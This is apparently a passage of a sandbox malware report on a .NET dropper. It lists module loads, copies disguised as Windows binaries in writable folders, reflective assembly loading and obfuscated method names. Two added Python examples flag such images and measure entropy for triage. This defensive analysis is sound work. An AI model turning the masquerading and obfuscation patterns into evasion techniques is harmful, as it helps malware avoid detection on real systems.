Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe Section loaded: wldp.dll
Source: C:\Recovery\System.exe Section loaded: profapi.dll
Source: C:\Recovery\System.exe Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\Recovery\System.exe Section loaded: mscoree.dll
Source: C:\Recovery\System.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe Section loaded: version.dll
Source: C:\Recovery\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe Section loaded: wldp.dll
Source: C:\Recovery\System.exe Section loaded: profapi.dll
Source: C:\Recovery\System.exe Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe Section loaded: sspicli.dll
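The module-load telemetry above carries two signals a triage script can pull out mechanically: Windows binary names (dllhost.exe, ShellExperienceHost.exe, System.exe) running from paths that are not the system directories, and .NET executables (mscoree.dll loaded) running out of user-writable folders such as C:\ProgramData, C:\Users\Public, C:\Users\Default and C:\Recovery. The following is an added example, not part of the Joe Sandbox report: it parses "Section loaded" lines in the report's format, flags images on either ground and lists the notable DLLs each flagged image loaded (AMSI, WMI client, WinHTTP). The sample lines are copied from the report; the list of system binary names, the directory lists and the DLL annotations are assumptions to extend for your environment.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Assumed: Windows binaries that belong in the system directories (or, for
# ShellExperienceHost, under SystemApps). "System" is the kernel process and
# has no on-disk image, so a System.exe is anomalous wherever it sits.
SYSTEM_IMAGE_NAMES = {
    "dllhost.exe", "audiodg.exe", "shellexperiencehost.exe", "svchost.exe",
    "schtasks.exe", "wscript.exe", "system.exe",
}
EXPECTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\systemapps")
# Assumed: user-writable locations that rarely host legitimate executables
WRITABLE_DIRS = (r"c:\programdata", r"c:\users\public", r"c:\users\default",
                 r"c:\recovery", r"c:\windows\temp")
# Assumed annotations for DLLs worth calling out from a suspicious image
NOTABLE_DLLS = {
    "mscoree.dll": ".NET CLR shim (managed executable)",
    "amsi.dll": "AMSI initialised (script or in-memory assembly scanning)",
    "wbemcomn.dll": "WMI client (process creation, VM fingerprinting)",
    "winhttp.dll": "WinHTTP client (download or C2)",
    "dnsapi.dll": "DNS resolution",
    "taskschd.dll": "Task Scheduler COM API",
}

LINE_RE = re.compile(r"^Source:\s+(?P<path>.+?\.exe)\s+Section loaded:\s+(?P<dll>\S+)", re.I)

# Constructed sample input, copied from the report's "Section loaded" lines
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll",
    r"Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: mscoree.dll",
    r"Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll",
    r"Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: amsi.dll",
    r"Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wbemcomn.dll",
    r"Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: winhttp.dll",
    r"Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: mscoree.dll",
    r"Source: C:\Recovery\System.exe Section loaded: mscoree.dll",
    r"Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll",
]


def _under(parent, roots):
    """True when the lower-cased directory `parent` is one of `roots` or below it."""
    return any(parent == r or parent.startswith(r + "\\") for r in roots)


def is_masquerading(path):
    """System-binary file name sitting outside the directories it ships in."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name not in SYSTEM_IMAGE_NAMES:
        return False
    if name == "system.exe":        # no legitimate on-disk location exists
        return True
    return not _under(str(p.parent).lower(), EXPECTED_DIRS)


def in_writable_location(path):
    return _under(str(PureWindowsPath(path).parent).lower(), WRITABLE_DIRS)


def parse_section_loads(lines):
    """{image_path: [dll, ...]} with DLLs de-duplicated in order of first load."""
    loads = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            dll = m.group("dll").lower()
            if dll not in loads[m.group("path")]:
                loads[m.group("path")].append(dll)
    return loads


def triage(lines):
    """{image_path: {"reasons": [...], "notable_dlls": [(dll, note), ...]}} for flagged images."""
    findings = {}
    for path, dlls in parse_section_loads(lines).items():
        reasons = []
        if is_masquerading(path):
            reasons.append("system binary name outside system directories")
        if in_writable_location(path) and "mscoree.dll" in dlls:
            reasons.append(".NET executable running from a user-writable location")
        if reasons:
            findings[path] = {
                "reasons": reasons,
                "notable_dlls": [(d, NOTABLE_DLLS[d]) for d in dlls if d in NOTABLE_DLLS],
            }
    return findings


if __name__ == "__main__":
    for path, info in triage(SAMPLE_LINES).items():
        print(path)
        for reason in info["reasons"]:
            print("  -", reason)
        for dll, note in info["notable_dlls"]:
            print("   ", dll, "->", note)
```

Run against the sample, schtasks.exe and wscript.exe in System32 pass, while the four dropped copies are flagged; the random-named copy under C:\ProgramData\USOShared\Logs is caught only by the writable-location rule, which is why both checks are kept.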
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: 4KjLUaW30K.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 4KjLUaW30K.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 4KjLUaW30K.exe Static file information: File size 1444352 > 1048576
Source: 4KjLUaW30K.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x15d000
Source: 4KjLUaW30K.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs .Net Code: qNlO1J0F0B System.AppDomain.Load(byte[])
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs .Net Code: qNlO1J0F0B System.Reflection.Assembly.Load(byte[])
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs .Net Code: qNlO1J0F0B
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 22_2_00007FF848F1DFD3 push edi; retf 22_2_00007FF848F1DFD6
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 27_2_00007FF848F400BD pushad ; iretd 27_2_00007FF848F400C1
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 29_2_00007FF848F3DFD3 push edi; retf 29_2_00007FF848F3DFD6
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 30_2_00007FF848F2DFD3 push edi; retf 30_2_00007FF848F2DFD6
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F4DFD3 push edi; retf 31_2_00007FF848F4DFD6
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F400BD pushad ; iretd 31_2_00007FF848F400C1
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 32_2_00007FF848F3DFD3 push edi; retf 32_2_00007FF848F3DFD6
Source: C:\Recovery\System.exe Code function: 33_2_00007FF848F1DFD3 push edi; retf 33_2_00007FF848F1DFD6
Source: C:\Recovery\System.exe Code function: 34_2_00007FF848F1DFD3 push edi; retf 34_2_00007FF848F1DFD6
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F0DFD3 push edi; retf 37_2_00007FF848F0DFD6
Source: C:\Recovery\System.exe Code function: 38_2_00007FF848F2DFD3 push edi; retf 38_2_00007FF848F2DFD6
Source: 4KjLUaW30K.exe Static PE information: section name: .text entropy: 7.185003266418592
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr Static PE information: section name: .text entropy: 7.185003266418592
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr Static PE information: section name: .text entropy: 7.185003266418592
Source: ShellExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 7.185003266418592
Source: dllhost.exe.0.dr Static PE information: section name: .text entropy: 7.185003266418592
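Both entropy indicators in this section are the same Shannon measure applied to different inputs: bits per byte over the raw .text section (7.185 here, against a maximum of 8), and bits per character over the concatenated method names of each .NET type. The following is an added example, not code from the report or from Joe Sandbox: it computes that measure, classifies a section value against a packer threshold, and compares the obfuscated names copied from the RdFx8MhwHpIAqTDYA0b.cs line below with an ordinary set of .NET method names. The 7.0 and 5.0 thresholds and the plain-name list are assumptions; plain x86 or CIL code usually sits well below 7 bits per byte and readable identifiers below 5 bits per character, while compressed or encrypted data and random alphanumeric names approach their respective maxima of 8 and log2(62).

```python
import math
from collections import Counter

# Copied from the report ("High entropy of concatenated method names", RdFx8MhwHpIAqTDYA0b.cs)
OBFUSCATED_NAMES = [
    "s6hEYjr3KF", "xtoEARS230", "xR5ED9lf8y", "OY8EpoCMg6", "R1S8IQX2743AD59twGm",
    "RkUe4uXIOO2ZObmsKrs", "QmbaBDXUw4g8967vNql", "JyFA64XqAuaw9fxJIGc",
    "WQ0JaiX388YDRhMxKpr", "IyT5sUXxMkP1hxBh3dd",
]
# Constructed comparison set: ordinary .NET method names (assumption, not from the report)
PLAIN_NAMES = ["Dispose", "ToString", "GetHashCode", "Equals", "get_Count",
               "Add", "Remove", "Clear", "Contains", "IndexOf"]

SECTION_PACKED_THRESHOLD = 7.0   # bits per byte; assumed heuristic
NAME_OBFUSCATED_THRESHOLD = 5.0  # bits per character; assumed heuristic


def shannon_entropy(data):
    """Shannon entropy in bits per symbol of `data` (bytes -> per byte, str -> per char)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_section(entropy_bits, threshold=SECTION_PACKED_THRESHOLD):
    """Label a PE section's entropy the way the report's 'entropy' lines are read."""
    return "packed/encrypted" if entropy_bits >= threshold else "plain"


def method_name_entropy(names):
    """Entropy of the concatenated method names of one type, as the report computes it."""
    return shannon_entropy("".join(names))


def looks_obfuscated(names, threshold=NAME_OBFUSCATED_THRESHOLD, min_chars=40):
    """Flag a type whose joined method names are long enough to measure and near-random.

    Very short joined strings cannot reach high entropy, so they are not judged here;
    the report handles one-to-three character names ('YZ8', '_66K') as a separate case.
    """
    joined = "".join(names)
    return len(joined) >= min_chars and shannon_entropy(joined) >= threshold


if __name__ == "__main__":
    print("uniform 256 bytes :", shannon_entropy(bytes(range(256))))
    print(".text (report)    :", classify_section(7.185003266418592))
    print("obfuscated names  :", round(method_name_entropy(OBFUSCATED_NAMES), 3),
          looks_obfuscated(OBFUSCATED_NAMES))
    print("plain names       :", round(method_name_entropy(PLAIN_NAMES), 3),
          looks_obfuscated(PLAIN_NAMES))
```

Note that the same .text entropy appears for the sample and every dropped copy, which is what you expect when the dropped files are byte-identical to the parent rather than re-packed per stage.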
Source: 4KjLUaW30K.exe, RdFx8MhwHpIAqTDYA0b.cs High entropy of concatenated method names: 's6hEYjr3KF', 'xtoEARS230', 'xR5ED9lf8y', 'OY8EpoCMg6', 'R1S8IQX2743AD59twGm', 'RkUe4uXIOO2ZObmsKrs', 'QmbaBDXUw4g8967vNql', 'JyFA64XqAuaw9fxJIGc', 'WQ0JaiX388YDRhMxKpr', 'IyT5sUXxMkP1hxBh3dd'
Source: 4KjLUaW30K.exe, pssBONvokLUj0rPrGVt.cs High entropy of concatenated method names: 'KhuIUeyvPV', 'qpAWNFQMTNVMlCJxhHE', 'OKMk4dQSpnwo72GtuAv', 'NOXMFRQsaH8KVZUYqft', 'DS3YBqQiIVkGymTvOI7', 'Tg0V5lCapQ', 'ytjVfLPMRZ', 'zBFV7ipDGv', 'rsbVt7DWx2', 'UAjVjReXSq'
Source: 4KjLUaW30K.exe, csVbO1bXkGVq46Zd3v.cs High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'MRKPVjJD7tIAgUraewD', 'h1maHZJAp7vetARPU0g', 'RRtQX1JZ3IyRWXP0gj6', 'uOE0eaJpg6IkdLkDQ6t', 'WknsxLJY5mLcTCVNmsB', 'sa0iqmJjbrBkEfb0V40'
Source: 4KjLUaW30K.exe, zRjdRcY0uBStDt7cu06.cs High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'kjV1L2d6nwpZN2gKpRe', 'LIvUBUdB61AO7X8DWVl', 'qCbhFRdCiQMIBlWqSjd', 'aqkTvldF7uafyLO15hB', 'lQfB7TdO66ckhYMBJrn', 's93fhJdzIjpIJJb3L14'
Source: 4KjLUaW30K.exe, jXbpxlNym9gDouik4Mu.cs High entropy of concatenated method names: 'hGpnJhNB6F', 'TOgnLTqxfJ', 'MfHnCfMuft', 'W2FnBPNH82', 'SrenoTYt2Y', 'R71jg9atrhFRAF4PcZD', 'VL0xE6awLSB9AX6LQeg', 'ePgAPbjOvHA4W4tAFNa', 'zbPCMojz2ffkcKtGyaT', 'DrqMXracC3Bc9gOe36n'
Source: 4KjLUaW30K.exe, EYxmENNgMAgigIOyy5j.cs High entropy of concatenated method names: '_0023Nn', 'Dispose', 'JahHjGZEdX', 'BRxHFSLv6P', 'C5xH28FjEA', 'HF1HRJ4WqB', 'iecHhjReok', 'ArmrUcifIShYjtDNidP', 'h2Ju90ig515xauXeLux', 'vkaoKXiuSp40XcIyYBC'
Source: 4KjLUaW30K.exe, t1FOf5u5vSxA9rNE92.cs High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'oV0G4hJiXbUioC6AaBj', 'VysoBpJMbeJTyMkJe2b', 'dvCi8bJSBhPaPf0PCt4', 'xq3A4oJefoyNaRbDIsQ', 'GM74WSJXl3Hhfj1B2uv', 'zJU4nCJWgJxiJnYjlli'
Source: 4KjLUaW30K.exe, UoSFo1hu4DGVNe1MMSI.cs High entropy of concatenated method names: '_5u9', 'NEU7niFAuN', 'UGZV6JvKrq', 'Jhh7H1kqwK', 'pypW4ikCD1OtijrH5cm', 'Op0iZskFZ8YG8AcIR1X', 'n0DD4ZkO4MlIYoBSsFr', 'GgNmfDk6PokSxiKouCh', 'bSCVASkBaqqEkZr0FKi', 'ya1i2SkzDNtkUQhjARl'
Source: 4KjLUaW30K.exe, q9i24FYAk4joCprBGEq.cs High entropy of concatenated method names: 'TA7mavaTcS', 'MNnRkuAdCJbjwIj8bLg', 'GbNdL2AuyTYNGQhEVIW', 'MkGjb7AJmhGZc1YsxJR', 'R6MkXNATrKDlhaDG9ST', 'xVt9ZwA4qBCCto35HuT', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs High entropy of concatenated method names: 'gmNG9PymMnmFGkUZHJF', 'hymh89yrHeBMAb3sclK', 'jflbevyGlC2hRs3LytW', 'XuWAiFyQF2Wk5evRrI7', 'CbAf12eDK4', 'halXaMyHYJV6fsDjCjr', 'QqTKBky7p1m3yCWmsq7', 'tAVBpnyqqWigHDOrbHv', 'li7F3qy3QB5NKTItwHZ', 'eXhbbAy2PAUcXSCX8DG'
Source: 4KjLUaW30K.exe, iVQJa2oxSIa1fZwxjyW.cs High entropy of concatenated method names: 'imuolNufV2', 'JsuoJlH6j6', 'YqAL9dU03ppiJR8RkgC', 'IAZvXZU64ghP5nHrA4D', 'ACfcZnUBXeLQLUl2LGP', 'EUvBKCUCmy3kQclFBNw', 'vqKjmcUFCjo6WkshEeM', 'Kwovn8UOGqNoAL3ti0B', 'ODwtAGUz5j00bBNvyFV', 'xYbwITxtlilNr6T5Eru'
Source: 4KjLUaW30K.exe, sXO9vehYHvkDjwvGIbG.cs High entropy of concatenated method names: 'zep4kVisfq', 'SSL45KGvgV', 'eNp4foYpfA', 'wiE47lj0ql', 'QQVXMdMz6WwAvIMTnrO', 'lpLAGYMFOff0oR64PWv', 'tviTYKMOtCVyOxwEs6i', 'fKicVWStiCQo07KuEVa', 'mrIxr7SwVssxNG3l6ym', 'mlTi3xSceqVMKqDNgUH'
Source: 4KjLUaW30K.exe, uLcP3aYciqMSyYeGRgx.cs High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'Fqx2J74IVaFG1bBou0R', 'UTmIPB4Uuayfd6pL5fu', 'eteWqi4xhi8MAmQdp5O', 'r5u3CQ4LloCdGAXI2Zu', 'cuuGK74oNiD686rYj0K', 'vyg1T34EMRVUN8QVYJy'
Source: 4KjLUaW30K.exe, mvgFL5Y6b0QUuoeLoPK.cs High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'jKokbJDX0dio5ZHLco3', 'ayT4q6DWo0kL6dteHUP', 'TgjdmDDkLcCH5mh4RGk', 'DCePQaDbkQHuWXb4bR7', 'eVyhfCDGlbw5cvhQBLF', 'dbyG9pDQ2dSYhng056V'
Source: 4KjLUaW30K.exe, YorUUdVOrRKdGCl9Uta.cs High entropy of concatenated method names: 'pU1Plsm8fR', 'VpmPJMcbdV', 'OKuPLNXJIU', 'dvfPCnDpiN', 'OsSPB5Ko3N', 'tHVutEECoMuPOfBJkIZ', 'rvTSs0EFTYC9kw012pB', 'j7OnaUEOSW0y5fNCCGb', 'EA4JfvEz9vHmkcdXb97', 'SAfnhDvtSqUexwBSnip'
Source: 4KjLUaW30K.exe, IVQrXTYdhw2b6IuNnmW.cs High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'njXy3buNOAQm0GIfyuA', 'XjEL5Gu0QuuIoWa3G8v', 'UUBHJ8u6l3HIcE2SJ5I', 'JOUwOtuB5gRnsQt0PKA', 'WAZslZuCr8RiyxDDVf1', 'uw6UgKuFy3sQ93Xrxbp'
Source: 4KjLUaW30K.exe, wx5AJ09t2ek3FMHXjn.cs High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'OY31nSTjxGuJPHaVgsE', 'uRfrpUTaV5A5oZ4Jmmk', 'HGNgpBTs3bDZLnUltx1', 'CX5Mf7TiZ8857rHPeqC', 'ehI9bWTMmAlJvvBLh0j', 'ijHEOXTSpK208TuIRcH'
Source: 4KjLUaW30K.exe, b1bLN1hdsT4GQl0AsQ6.cs High entropy of concatenated method names: 'p10Eg1rJQS', 'tJkEqdfdxG', 'e2lEXHGdPM', 'oOR32vXy7Vf8OPoseDD', 'OegrjLXRaWPEBF1WV8t', 'cDK7VrX5Cd0gvRvHdOP', 'Jw95B1XlEoSTDSPGwex', 'RQCCOeXPIVXAOJxaYgH', 'qsmTpUXnCG5k4y2eH57', 'G3j2qkXNDEWgrVabLc6'
Source: 4KjLUaW30K.exe, aaHxfKot3wBhAtbghOZ.cs High entropy of concatenated method names: 'rRZoh0N8cd', 'hAKouWOWH3', 'c5Po9NfTpx', 'WHWoxEhxDl', 'Af7oYPlEs5', 'GkBkvGx1ilbiPh6Za2E', 'kBiwM3xmugAUuptZVwT', 'Uj8T3axrUk7iBPjwQ9u', 'QXREoSx95SQOWLfIhgT', 'j9SWKDxHEC0XAsiBopW'
Source: 4KjLUaW30K.exe, LvpXsezbnH0kVtox77.cs High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'PrVY0HdKNrZHKtBBZRv', 'VcxrBDdJG8U7fmWfaP3', 'Kprfl5dTtk0eii8aFcZ', 'rOPm1Edd9DrgxjY9qte', 'NvXo7tduF94uvs3oXKO', 'F5t46Qd4NZMb87h32DV'
Source: 4KjLUaW30K.exe, kaFj5ehAhn7SApeLRJ6.cs High entropy of concatenated method names: 'Cmg8nxGxDeNA5gtByZk', 'zrXo8uGLueKRehjBFs8', 'xFvrGXGIkGmEmIdF9bg', 'm5yE4wGU2QsN82pxobq', 'IWF', 'j72', 'aAoVUJsid1', 'JSlVMPcEMQ', 'j4z', 'BbMVGQhrb2'
Source: 4KjLUaW30K.exe, WrALtDVt1SeisN1My3e.cs High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 4KjLUaW30K.exe, gbwyYgv3ti61ctQdP1F.cs High entropy of concatenated method names: 'jwU1iyyeWU', 'Ecb1jgIZir', 'wj01Fn0kf1', 'gRk121SBxq', 'HD51RHXiry', 'jRV1hqnWed', 'FMh1urlpUg', 'IOt191h7kF', 'TRA1x14iKK', 'bxa1YkvaF5'
Source: 4KjLUaW30K.exe, f2VANrYn2uMOLmfKVWn.cs High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'Ocyg68fUPlO6yC0bKZu', 'ngC4agfxdRNQ1XEG04b', 'iowKKXfLSlS3CZybEiZ', 'lGCJyAfojgQMJmVMxvN', 'QmtckBfEnZ3jB5lssPa', 'AZfBFefvtxkNh27qTgf'
Source: 4KjLUaW30K.exe, WNWwPKYOQJBxvHSPw4u.cs High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'CZxHBY4Gbap1FN1Nlia', 'CyqZHF4QQBoO93GUYQ9', 'M9URAJ4mPcVOC6ssqJI', 'y6kWF94r7NTKgiRTIRG', 'ErekOM414qAISmKZG8E', 'G5Dl2k49TnBvv65jtPG'
Source: 4KjLUaW30K.exe, SiFU3k08VVtuEJmLFC3.cs High entropy of concatenated method names: 'hbVieLDDgps8g', 'cu1wMYyjuQC4SUcDc53', 'Kn65TLya3mpm34nWRea', 'mWV9e3ys8XVgdXL7coJ', 'NSj3wLyinCS73QCTwsv', 'dG5yMiyMRqJeMuCuMGq', 'hh7j1nypsxud7PVOXxc', 'EkCBJ8yYHtIreOHbXZm', 'xKv2MgySm0bGtLFfDbA', 'heXqWfye7Sp6gq9ApoJ'
Source: 4KjLUaW30K.exe, kIcqdXYoQ1J3IyjUpbB.cs High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'lMcAJydyV7OwKeIqtrU', 'lnxPpjdRTjp1tP0PyEw', 'J2ALYid52O13p5HjTSY', 'b8woPMdlgSFnM3uYOXE', 'L4aibndPhkRkvssXrN9', 'HrXTLcdnRk4ECFYd1Pn'
Source: 4KjLUaW30K.exe, skUQt8oHJIg7GoYYbNA.cs High entropy of concatenated method names: 'vMKdnFEJx2', 'zJfdH4PuR6', 'kjFdQydwAo', 'xWjd4l4Kaw', 'wYSdElwWFv', 'wGgdrath5X', 'csrdVU7GI4', 'kdld3hwK6D', 'vmYdIG14mV', 'qSed0S482R'
Source: 4KjLUaW30K.exe, GZkZi6N25CU3ZM39Yj8.cs High entropy of concatenated method names: 'nx1mdWHWIW', 'Tk9mPwAvKc', 'mOJmKG8ZPq', 'nW54rVA31nZArZCoIeK', 'hljH01A2eVyNNZfBRtn', 'qoVHpkAIlrDQcMnG3tp', 'vaobcqAU4k4CbCPI62F', 'al5VQeAxlZa01H0MclA', 'aWrR4dALinSd85KKN5K', 'uREEBiA7VWoqMnMmLHF'
Source: 4KjLUaW30K.exe, NomT1BvPedyJf7edpoP.cs High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 4KjLUaW30K.exe, jp8wrGYwREVGwsYMwhU.cs High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'KwUTnbuoR4PGldwNALP', 'xxyP1NuEX0e95w2kSsK', 'vXH0hbuvbTjbAtWLEi8', 'iPocpUuVN1Hh3GEQce5', 'Hjw815u8xhj8q0ARU5D', 'I5cdavuhhUSVhObBTjO'
Source: 4KjLUaW30K.exe, sW4CwMvqMV4gjqDPAwt.cs High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'EYp18egKX6', 'FX61crElb0', 'r8j', 'LS1', '_55S'
Source: 4KjLUaW30K.exe, U4V5YBYGovk0uMqoHJ7.cs High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'VmZCwturZ0DAFBp31sy', 'RrWjpCu1YEZwB2w0iXH', 'AjqGfnu9xBTDfv8J9hG', 'NgmsP5uHIkD3R1eDC2X', 'tt6XSVu7ltV9PL3Zd1y', 'rZUO0Iuq1bxSDjtu5Yl'
Source: 4KjLUaW30K.exe, cZbENoh1wJqlr2AhSOG.cs High entropy of concatenated method names: 'KV8EtkDUGY', 'uDoEja6DTq', 'lyCEFQy7a3', 'zWByHlXYn3hcuemFsyO', 'CQUcaRXZppVHdTkllT4', 'xiMsUjXpiiVngS2qlvT', 'URbloXXjSPaT31q4idY', 'wpnE86IPUQ', 'S5gEcQHyjQ', 'RHtEUTU0wp'
